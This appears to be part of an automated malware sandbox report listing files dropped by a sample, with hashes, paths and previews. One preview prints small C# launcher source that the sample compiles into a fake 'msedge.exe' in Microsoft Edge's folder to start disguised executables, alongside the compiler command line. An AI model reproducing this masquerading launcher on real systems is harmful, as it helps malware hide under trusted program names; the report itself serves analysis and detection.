                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...$..f................................. ........@.. .......................@............@.....................................K....... .................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc... ...........................@....reloc....... ......................@..B........................H......................T.......*........................................0..........(.... ........8........E....M.......)...\...8H...(.... ....~....{....:....& ....8....(.... ....~....{....:....& ....8....(.... ....8....*....0.......... ........8........E....{.......:...........8v...r...ps....z*~....:.... ....~....{....9....& ....8........~....(@...~....(D... ....?.... ....~....{....:w...& ....8l...~....(8... .... .... ....s....~....(<....... ....~....{....9,...& ....8!......

                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\WinPerfcommon.exe.log

                                                                Download File
                                                                Process:C:\msproviderBrokerMonitornet\WinPerfcommon.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):1396
                                                                Entropy (8bit):5.350961817021757
                                                                Encrypted:false
                                                                SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNrJE4qtE4KlOU4mZsXE4Npv:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHKu
                                                                MD5:EBB3E33FCCEC5303477CB59FA0916A28
                                                                SHA1:BBF597668E3DB4721CA7B1E1FE3BA66E4D89CD89
                                                                SHA-256:DF0C7154CD75ADDA09758C06F758D47F20921F0EB302310849175D3A7346561F
                                                                SHA-512:663994B1F78D05972276CD30A28FE61B33902D71BF1DFE4A58EA8EEE753FBDE393213B5BA0C608B9064932F0360621AF4B4190976BE8C00824A6EA0D76334571
                                                                Malicious:false
                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr

                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe.log

                                                                Download File
                                                                Process:C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe
                                                                File Type:CSV text
                                                                Category:dropped
                                                                Size (bytes):847
                                                                Entropy (8bit):5.354334472896228
                                                                Encrypted:false
                                                                SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                Malicious:false
                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):64
                                                                Entropy (8bit):1.1940658735648508
                                                                Encrypted:false
                                                                SSDEEP:3:NlllulxmH/lZ:NllUg
                                                                MD5:D904BDD752B6F23D81E93ECA3BD8E0F3
                                                                SHA1:026D8B0D0F79861746760B0431AD46BAD2A01676
                                                                SHA-256:B393D3CEC8368794972E4ADD978B455A2F5BD37E3A116264DBED14DC8C67D6F2
                                                                SHA-512:5B862B7F0BCCEF48E6A5A270C3F6271D7A5002465EAF347C6A266365F1B2CD3D88144C043D826D3456AA43484124D619BF16F9AEAB1F706463F553EE24CB5740
                                                                Malicious:false
                                                                Preview:@...e................................. ..............@..........

                                                                C:\Users\user\AppData\Local\Temp\04s13a00\04s13a00.0.cs

                                                                Download File
                                                                Process:C:\msproviderBrokerMonitornet\WinPerfcommon.exe
                                                                File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                                Category:dropped
                                                                Size (bytes):430
                                                                Entropy (8bit):4.999150238049071
                                                                Encrypted:false
                                                                SSDEEP:12:V/DNVgtDIbSf+eBL6LzIfiFkMSf+eBL6LSMdBu0qCaiFkD:JNVQIbSfhWLzIiFkMSfhWLSMdU0qC7FI
                                                                MD5:E62EC9FBB277830D68682FE953D9E791
                                                                SHA1:7C89FABCF6820C1788DFB24241F5E32714212A6E
                                                                SHA-256:845E96E267ABF11485AA0670C2EE8D082B1DF8D08066526246D56E33EB4804FD
                                                                SHA-512:AFBFE82327E27ECF161F2E29E11750904A89B11E9B874394C57DE08E4589B7DB612097BF0952284FE4F8A8041EB6D1F10B6CB65A4968AC21966A0D84066C2FD7
                                                                Malicious:false
                                                                Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\windows portable devices\OfficeClickToRun.exe"); } catch { } }).Start();. }.}.

                                                                C:\Users\user\AppData\Local\Temp\04s13a00\04s13a00.cmdline

                                                                Download File
                                                                Process:C:\msproviderBrokerMonitornet\WinPerfcommon.exe
                                                                File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):266
                                                                Entropy (8bit):5.155244518318101
                                                                Encrypted:false
                                                                SSDEEP:6:Hu+H2L//1xRf5oeTckKBzxsjGZxWE8o923f3tFx:Hu7L//TRRzscQyPtFx
                                                                MD5:04E4B9B5D790651107477A2763799F2F
                                                                SHA1:2E5A3869262A113C553CFE6F3E3F78305B3C5FF8
                                                                SHA-256:29631AE81DEDA54F7FB49F2E6C64CC313C6F8F924AF77638C3EBD18C604BFADA
                                                                SHA-512:4EEA46505AFDF64A83AFE67B3914F089619FEF0B71A77977B39DFEFAE378B635D08E49C497FD405A8CF5865D8DB5E47CA4F61DA9CA2D42AAC8E1750411B738D8
                                                                Malicious:true
                                                                Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\04s13a00\04s13a00.0.cs"

                                                                C:\Users\user\AppData\Local\Temp\04s13a00\04s13a00.out

                                                                Download File
                                                                Process:C:\msproviderBrokerMonitornet\WinPerfcommon.exe
                                                                File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (352), with CRLF, CR line terminators
                                                                Category:modified
                                                                Size (bytes):773
                                                                Entropy (8bit):5.243122303850398
                                                                Encrypted:false
                                                                SSDEEP:24:y9I/un/VRzstyMKax5DqBVKVrdFAMBJTH:y9N/VRzfMK2DcVKdBJj
                                                                MD5:BC4E40E89611469AE25DBCB5E601FCD4
                                                                SHA1:B6B189479BFB1F769D36CBD2055141F79A3F2DFA
                                                                SHA-256:107302ED39130FED0CEE4201400A994303B23BB7114CDC4387786EA574244F64
                                                                SHA-512:0D7502635D9CAE9CE436601A20D9ECE6B96CC1F497AA39FBC4CC7AC5391E1993CE62A360D1024CF3E2D3901FA9D3B859FE62F22D1181FC75EE67734B75736DE4
                                                                Malicious:false
                                                                Preview:.C:\msproviderBrokerMonitornet> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\04s13a00\04s13a00.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                C:\Users\user\AppData\Local\Temp\AGFnuBOya1

                                                                Download File
                                                                Process:C:\msproviderBrokerMonitornet\WinPerfcommon.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):25
                                                                Entropy (8bit):4.163856189774723
                                                                Encrypted:false
                                                                SSDEEP:3:JgeoVy:+g
                                                                MD5:99C3E12460236012B006E9C11F4D22F2
                                                                SHA1:25359E87BF01FFA9C9D3885EF1807E12569794E2
                                                                SHA-256:168FDD35F2E5F9C566C3E28A6EC58EFE11C0CFF2D686879E4698A620A9EE7541
                                                                SHA-512:0DF2D08120B20505AD0EDFE98FC84B4585BA35D484980FDF2EC4F8EE8B2DDB2B47AE66DC4F0C0FA2B0890B03EAAE64F6F8FDAAEC405CB6E3515DD702A76EB8DE
                                                                Malicious:false
                                                                Preview:yY451wFfTYrGp727oFvM0YYAP

                                                                C:\Users\user\AppData\Local\Temp\RES4FDD.tmp

                                                                Download File
                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6d8, 10 symbols, created Sat Jan 11 16:42:49 2025, 1st section name ".debug$S"
                                                                Category:dropped
                                                                Size (bytes):1936
                                                                Entropy (8bit):4.607477947796084
                                                                Encrypted:false
                                                                SSDEEP:24:HUy9FLz3OHPwK5N6lmxT0uZhNB+h9PNnqpdt4+lEbNFjMyi0+mcN:3Lz3O4K5klmuulB+hnqXSfbNtmhz
                                                                MD5:7FE59190F628DDF562DA8933DBA0B177
                                                                SHA1:ADD835B1BEE73A2AB2C268017512849AB7EA27EF
                                                                SHA-256:5D9D6F8ED6B69E0A9032021EA56BFAF2DC9359A8B01C6F5D6EA37F6A79E5524E
                                                                SHA-512:9F7467058C226922F9638218CA7955F739A21361F7D86FA7A64A3E4A6EFC490BEF5772214AFEDE077DAB26B4C0B85BCD182A7635DF4C49C4C935BE05C057AA72
                                                                Malicious:false
                                                                Preview:L......g.............debug$S........`...................@..B.rsrc$01............................@..@.rsrc$02........8...................@..@........[....c:\Program Files (x86)\Microsoft\Edge\Application\CSCAA8B5102F2134902BBA166DD4B5C8948.TMP....................q.QK.......N..........5.......C:\Users\user\AppData\Local\Temp\RES4FDD.tmp.-.<....................a..Microsoft (R) CVTRES.e.=..cwd.C:\msproviderBrokerMonitornet.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe......................... .......8.......................P.......................h.......................................................D...............................................D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.

                                                                C:\Users\user\AppData\Local\Temp\RES520F.tmp

                                                                Download File
                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6f4, 10 symbols, created Sat Jan 11 16:42:49 2025, 1st section name ".debug$S"
                                                                Category:dropped
                                                                Size (bytes):1964
                                                                Entropy (8bit):4.549616830759594
                                                                Encrypted:false
                                                                SSDEEP:24:HYnW9HOXAIHSfwK5NyluxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0+hgUZ:epQIjK5MluOulajfqXSfbNtmhNZ
                                                                MD5:3AEE2A776541DD144295895338AFC9F4
                                                                SHA1:3FF19F9B0C9A1B8084976DDB3EDD384E255ACFB2
                                                                SHA-256:6B62C957FEBA0A938E69EE482A92D0CDB07D2EABE32ECA906A10227ECC6A2E62
                                                                SHA-512:BC293C47A755EA0F575CF6FDFBEFCD543059BF11D9853A2CDB43A83954A5B043746C97447A212D14AB78AB3FBC2E2854D92061915B4F0203842A4B4CFC27F86D
                                                                Malicious:false
                                                                Preview:L......g.............debug$S........D...................@..B.rsrc$01................p...........@..@.rsrc$02........p...................@..@........=....c:\Windows\System32\CSCBE040DD0C77A40C69F3560F59F6749C9.TMP.....................r.av..t.y..............5.......C:\Users\user\AppData\Local\Temp\RES520F.tmp.-.<....................a..Microsoft (R) CVTRES.e.=..cwd.C:\msproviderBrokerMonitornet.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe......................... .......8.......................P.......................h.......................................................|...............................................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0ffyeqm1.emh.psm1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4ucpegou.nsq.psm1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_50pdkmcq.epl.ps1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a232tj4d.1od.psm1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_az1hnfx3.ec0.psm1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bsf4oq1i.3a4.ps1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c151wae1.ab0.ps1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dpxh1wic.r1w.ps1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gkjhdwai.hh0.psm1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gp3yg3gv.45r.psm1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k3fbmduw.v4d.psm1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lixyfrai.ffs.psm1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mfjlmcit.gn1.ps1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oikmw4nz.sgi.ps1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_okm0e5tl.ftv.psm1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_olsdr1xq.wmk.psm1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
